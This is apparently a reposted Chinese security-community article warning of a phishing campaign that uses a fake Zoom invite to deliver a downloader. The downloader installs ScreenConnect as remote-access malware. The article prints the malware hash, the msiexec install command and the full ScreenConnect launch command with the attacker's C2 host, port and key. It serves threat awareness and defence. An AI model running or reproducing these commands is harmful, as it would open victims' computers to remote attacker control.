点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
🌟简介
协作工具如今非常流行。自新冠以来,许多人转岗到远程工作,我们每天都需要与同事或客户协作。像 Microsoft Teams、Zoom、WebEx... 等工具变得非常流行,并且必须定期更新。近期发现有个邮件中包含一个病毒假冒的 Zoom 会议邀请:
当你点击加入时,你会访问一个网站。该 HTML 页面没有恶意,但它要求你安装最新的 Zoom 客户端:
如果你点击下载按钮,你会得到一个不错的“礼物”:一个名为
“Session.ClientSetup.exe”(SHA256:f5e467939f8367d084154e1fefc87203e26ec711dbfa83217308e4f2be9d58be)的可执行文件。
这种恶意软件非常简单,只是一个下载器。它将一个 MSI 软件包下载到磁盘上:
C:UsersadminAppDataLocalTempScreenConnect25.2.4.922984cae30d9bf18843ScreenConnect.ClientSetup.msi然后安装它:
"C:WindowsSystem32msiexec.exe" /i "C:UsersadminAppDataLocalTempScreenConnect25.2.4.922984cae30d9bf18843ScreenConnect.ClientSetup.msi"最后,启动新安装的工具并进行配置(也作为服务进行安装以实现持久化)
"C:Program Files (x86)ScreenConnect Client (84cae30d9bf18843)ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=tqtw21aa.anondns.net&p=8041&s=6c9715c2-054f-49cc-b888-4084388fc1c5&k=BgIAAACkAABSU0ExAAgAAAEAAQC9dnuqTcFjsgNQridID1kdRpR1VfdwtJjAbZxJ7OqFEjxozVJJ4Fk%2f6wGXUk5FLry2iN4xJDNUkf936O5CbriOKbT5HTkP0KzDmnvehBgv0%2b2%2fHQKELyECMoUtB30UYsSUj%2fyrCMsNLX4BcMNVuQbCBHZX7joQ15PIeSAzEA1ZNI9h8q2Toz7hToU1Rv9kyNBeIoulf9o%2f3FFzBoJYcABIvPgkJu8DHWjJdqR30nYdCT7iJadZIr62PCaEcStVmdD7YDMjizQar9ehuiswtnWKYu9AwCiNiEbNKlW8ymbGR5nI4sfqkAaPoz%2fnP8rmoIeBiy7fzYg3rl7nKjwzPqCw&c=&c=&c=XigRocky&c=&c=&c=&c=&c="ScreenConnect[1] 是一个知名的远程访问工具,将允许攻击者访问受害者的计算机。
该工具使用以下 C2 配置进行安装:tqtw21aa[.]anondns[.]net (151[.]242[.]63[.]139) 在端口 8041 上。
原文始发于微信公众号(SecHub网络安全社区):谨防近期出现的钓鱼的假Zoom客户端
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论